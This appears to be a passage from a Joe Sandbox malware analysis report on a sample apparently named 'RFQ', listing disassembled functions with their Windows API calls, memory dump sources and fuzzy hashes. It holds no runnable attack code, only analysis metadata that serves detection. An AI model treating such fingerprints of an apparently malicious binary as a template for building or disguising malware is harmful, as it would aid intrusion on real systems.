                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorMode$InformationVolume
                                                                          • String ID: \VH
                                                                          • API String ID: 2507767853-234962358
                                                                          • Opcode ID: 3e53e890434f9ea80ffb8b8b8863db28d9ef5c2317443d22617d365319ccab8e
                                                                          • Instruction ID: 9072e4f9bd6fffdf4d5f5b526d3ef1379cf95bcdbb04681c41660468616ecd75
                                                                          • Opcode Fuzzy Hash: 3e53e890434f9ea80ffb8b8b8863db28d9ef5c2317443d22617d365319ccab8e
                                                                          • Instruction Fuzzy Hash: E5213075A002099FC714EF95CD85EAEB7B8FF88300F1084AAE905A73A1D774EA45CB54
                                                                          Function 0045D53E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 75COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SetErrorMode.KERNEL32(00000001), ref: 0045D55C
                                                                          • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D5D2
                                                                          • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D608
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorMode$InformationVolume
                                                                          • String ID: \VH
                                                                          • API String ID: 2507767853-234962358
                                                                          • Opcode ID: d1fa58eff2fbb7cc6c51b85e489fdb3630b63cb8eb333212ecdab13a3ad88969
                                                                          • Instruction ID: 5d1496e5fec29648c5677f840c6a5ff7f703137340fc9510fe584f3610dc7e3a
                                                                          • Opcode Fuzzy Hash: d1fa58eff2fbb7cc6c51b85e489fdb3630b63cb8eb333212ecdab13a3ad88969
                                                                          • Instruction Fuzzy Hash: 88218271A00209AFC714EF95C885EAEB7B4FF48300F0084AEF505A72A1D774E905CB58
                                                                          Function 00450ACC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 74windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00450B3B
                                                                          • SendMessageW.USER32(00000000,00000406,00000000,00640000), ref: 00450B51
                                                                          • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00450B5F
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend
                                                                          • String ID: msctls_trackbar32
                                                                          • API String ID: 3850602802-1010561917
                                                                          • Opcode ID: b7bd052b599063d2228b5cfe26d5df8f76e43bb35df486dd72efd91b953fbf0c
                                                                          • Instruction ID: cc80dcb7cd3031ad5716ab9229ca2671b5dcb2452333e47e40e099fef7a03d8b
                                                                          • Opcode Fuzzy Hash: b7bd052b599063d2228b5cfe26d5df8f76e43bb35df486dd72efd91b953fbf0c
                                                                          • Instruction Fuzzy Hash: 301196757403197BEB109EA8DC81FDB339CAB58B64F204216FA10A72C1D6B4FC5187A8
                                                                          Function 00435215 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 71COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                          • CLSIDFromString.OLE32(?,00000000), ref: 00435236
                                                                          • SafeArrayAccessData.OLEAUT32(?,?), ref: 00435285
                                                                          • SafeArrayUnaccessData.OLEAUT32(?), ref: 004352B4
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: ArrayDataSafe$AccessFromStringUnaccess_malloc
                                                                          • String ID: crts
                                                                          • API String ID: 943502515-3724388283
                                                                          • Opcode ID: 529e37b86e0cb06f9ed43835dc92f00344189a4a835cae890eb44c126e03fe94
                                                                          • Instruction ID: ec3ec3aa447b477297a9cb7ebc6a7fbeb91602aa87849f29064a6671b92f781e
                                                                          • Opcode Fuzzy Hash: 529e37b86e0cb06f9ed43835dc92f00344189a4a835cae890eb44c126e03fe94
                                                                          • Instruction Fuzzy Hash: EC213876600A009FC714CF8AE444D97FBE8EF98760714C46AEA49CB721D334E851CB94
                                                                          Function 0045D2C7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SetErrorMode.KERNEL32(00000001), ref: 0045D2D2
                                                                          • SetVolumeLabelW.KERNEL32(?,00000000), ref: 0045D331
                                                                          • SetErrorMode.KERNEL32(?), ref: 0045D35C
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorMode$LabelVolume
                                                                          • String ID: \VH
                                                                          • API String ID: 2006950084-234962358
                                                                          • Opcode ID: 06ec5ceac71ab965c19bbe619e509a4f86e9865fc889b709aa917be6b1aab059
                                                                          • Instruction ID: 93ef07912bcba266d24f4400c0aa25f887f93b2782b8649f9ae8f5902fc9f078
                                                                          • Opcode Fuzzy Hash: 06ec5ceac71ab965c19bbe619e509a4f86e9865fc889b709aa917be6b1aab059
                                                                          • Instruction Fuzzy Hash: 10115175900105DFCB00EFA5D94499EBBB4FF48315B1084AAEC09AB352D774ED45CBA5
                                                                          Function 004496E9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                          • GetMenuItemInfoW.USER32 ref: 00449727
                                                                          • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00449751
                                                                          • DrawMenuBar.USER32 ref: 00449761
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: Menu$InfoItem$Draw_malloc
                                                                          • String ID: 0
                                                                          • API String ID: 772068139-4108050209
                                                                          • Opcode ID: 15a76c8cdafcabc0d330a2bd3afc87876622b04de3c231e264bb1fcb70d0c272
                                                                          • Instruction ID: eb12e692e9d899ed3776fa10421b592e4983edb38958d2313c52402e3f8558b6
                                                                          • Opcode Fuzzy Hash: 15a76c8cdafcabc0d330a2bd3afc87876622b04de3c231e264bb1fcb70d0c272
                                                                          • Instruction Fuzzy Hash: 7711A3B1A10208AFEB10DF55DC49BAFB774EF85314F0041AEFA098B250DB759944DFA5
                                                                          Function 00472A2B Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 34COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: _wcslen$_wcscpy
                                                                          • String ID: 3, 3, 8, 1
                                                                          • API String ID: 3469035223-357260408
                                                                          • Opcode ID: 12b73319f7521ef091ea4856e2d9fc07411b991347f193140c1b9c5819a8a9d6
                                                                          • Instruction ID: 583e1dd4926d5dc430cd1974fab242c37593855fc3f83b6d902887b8cb8118b3
                                                                          • Opcode Fuzzy Hash: 12b73319f7521ef091ea4856e2d9fc07411b991347f193140c1b9c5819a8a9d6
                                                                          • Instruction Fuzzy Hash: 44F06D61510655E2CB34A791AD917FF72546F44341F00947BD90ED2190F368CB85CF99
                                                                          Function 004312CC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004312DE
                                                                          • GetProcAddress.KERNEL32(00000000,IcmpCloseHandle), ref: 004312F0
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: AddressLibraryLoadProc
                                                                          • String ID: ICMP.DLL$IcmpCloseHandle
                                                                          • API String ID: 2574300362-3530519716
                                                                          • Opcode ID: 21a2acdac0ba1e2d746e72dbff1012e7ad80fb0484e1fffebf05da08cb8a0c44
                                                                          • Instruction ID: fe30dd6f995ef3e52e92cf139519288d45b371df6a06e7fbbc01cfddaae6e452
                                                                          • Opcode Fuzzy Hash: 21a2acdac0ba1e2d746e72dbff1012e7ad80fb0484e1fffebf05da08cb8a0c44
                                                                          • Instruction Fuzzy Hash: 89E01275500316DFDB105F66D80564B77DCDB14751F10482AFD45E2A51DBB8D48087E8
                                                                          Function 004312FE Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 00431310
                                                                          • GetProcAddress.KERNEL32(00000000,IcmpCreateFile), ref: 00431322
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: AddressLibraryLoadProc
                                                                          • String ID: ICMP.DLL$IcmpCreateFile
                                                                          • API String ID: 2574300362-275556492
                                                                          • Opcode ID: c8e81b458e49d693ad0b98c25d1a2273645c6015ec642ff3830cff94addfde50
                                                                          • Instruction ID: 95e0d00128142f820e0a83de5ed484af687323a382b0c693d148963e73e99334
                                                                          • Opcode Fuzzy Hash: c8e81b458e49d693ad0b98c25d1a2273645c6015ec642ff3830cff94addfde50
                                                                          • Instruction Fuzzy Hash: E3E0C270400306EFD7107FA5D81464A77E8DB08310F104C2AFC40A2650C7B8D48087A8
                                                                          Function 0043129A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004312AC
                                                                          • GetProcAddress.KERNEL32(00000000,IcmpSendEcho), ref: 004312BE
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: AddressLibraryLoadProc
                                                                          • String ID: ICMP.DLL$IcmpSendEcho
                                                                          • API String ID: 2574300362-58917771
                                                                          • Opcode ID: 8463976e88658be12d547e53f001863c36b7eb8c5d8a0eb88088b9b0d7e59d79
                                                                          • Instruction ID: f6e067919a3be2c94262fb81e38fb1c28335358536499f04279aa6303c0198c7
                                                                          • Opcode Fuzzy Hash: 8463976e88658be12d547e53f001863c36b7eb8c5d8a0eb88088b9b0d7e59d79
                                                                          • Instruction Fuzzy Hash: ADE0C2B0400706DFC7105F65D80465B77D8DB04321F10482BFD80E2610C7B8E48087A8
                                                                          Function 00430C7F Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00430C91
                                                                          • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00430CA3
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: AddressLibraryLoadProc
                                                                          • String ID: RegDeleteKeyExW$advapi32.dll
                                                                          • API String ID: 2574300362-4033151799
                                                                          • Opcode ID: d4a2309a593705586ca0189df29ebf11fe16cb5b9b4952fb03c76dd6ffec2ddb
                                                                          • Instruction ID: e1e112c22781e886f83f7ab60c8bc672304d94c0271b2a691c2b6ddb7eb549cd
                                                                          • Opcode Fuzzy Hash: d4a2309a593705586ca0189df29ebf11fe16cb5b9b4952fb03c76dd6ffec2ddb
                                                                          • Instruction Fuzzy Hash: 3FE0C2B0440315AFCB106F6AD95460B7BD89B14321F10583BF980E2600C7B8E88087B8
                                                                          Function 00451D2B Relevance: 6.4, APIs: 4, Instructions: 405COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 6f77df26dc74fc40ac7bf47809af4b9178697b073442c11c01de5ef3306f6c16
                                                                          • Instruction ID: c5df29d3d24fc858ebdc5227190e2e918b6fbc7f8fe9fd347d916346834f6d96
                                                                          • Opcode Fuzzy Hash: 6f77df26dc74fc40ac7bf47809af4b9178697b073442c11c01de5ef3306f6c16
                                                                          • Instruction Fuzzy Hash: 66E17F75600209AFCB04DF98C880EAEB7B9FF88714F10859AE909DB351D775EE45CBA0
                                                                          Function 00479500 Relevance: 6.2, APIs: 4, Instructions: 162memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • VariantInit.OLEAUT32(?), ref: 0047950F
                                                                          • SysAllocString.OLEAUT32(00000000), ref: 004795D8
                                                                          • VariantCopy.OLEAUT32(?,?), ref: 0047960F
                                                                          • VariantClear.OLEAUT32(?), ref: 00479650
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: Variant$AllocClearCopyInitString
                                                                          • String ID:
                                                                          • API String ID: 2808897238-0
                                                                          • Opcode ID: d4078b498bd58c38c4ff211c6799319bb2158b2b01decc8b4cd966ad5c1122ff
                                                                          • Instruction ID: 372c40b5ecffa4d340e825e49f449287305c7189bb1404562c27c74c4f1437f4
                                                                          • Opcode Fuzzy Hash: d4078b498bd58c38c4ff211c6799319bb2158b2b01decc8b4cd966ad5c1122ff
                                                                          • Instruction Fuzzy Hash: 8251C436600209A6C700FF3AD8815DAB764EF84315F50863FFD0897252DB78DA1997EA
                                                                          Function 0046993E Relevance: 6.1, APIs: 4, Instructions: 149windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SendMessageW.USER32(00000000,0000110A,00000004,?), ref: 00469990
                                                                          • __itow.LIBCMT ref: 004699CD
                                                                            • Part of subcall function 00461C4A: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00461CC2
                                                                          • SendMessageW.USER32(00000000,0000110A,00000001,?), ref: 00469A3D
                                                                          • __itow.LIBCMT ref: 00469A97
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$__itow
                                                                          • String ID:
                                                                          • API String ID: 3379773720-0
                                                                          • Opcode ID: f450223117ea95bfee34014d9d84978b58918b7dbb146b9b64e9adf8c20a5af9
                                                                          • Instruction ID: c5a9f548720e127460bbd30f9c4a1142764b372a0404ca0a71d180b9b8c9b2b0
                                                                          • Opcode Fuzzy Hash: f450223117ea95bfee34014d9d84978b58918b7dbb146b9b64e9adf8c20a5af9
                                                                          • Instruction Fuzzy Hash: E8415671A002096BDB14EF95D981AEF77BC9F58314F00405EFA0567281E7789E46CBE9
                                                                          Function 004499DB Relevance: 6.1, APIs: 4, Instructions: 145COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetWindowRect.USER32(?,?), ref: 00449A4A
                                                                          • ScreenToClient.USER32(?,?), ref: 00449A80
                                                                          • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 00449AEC
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: Window$ClientMoveRectScreen
                                                                          • String ID:
                                                                          • API String ID: 3880355969-0
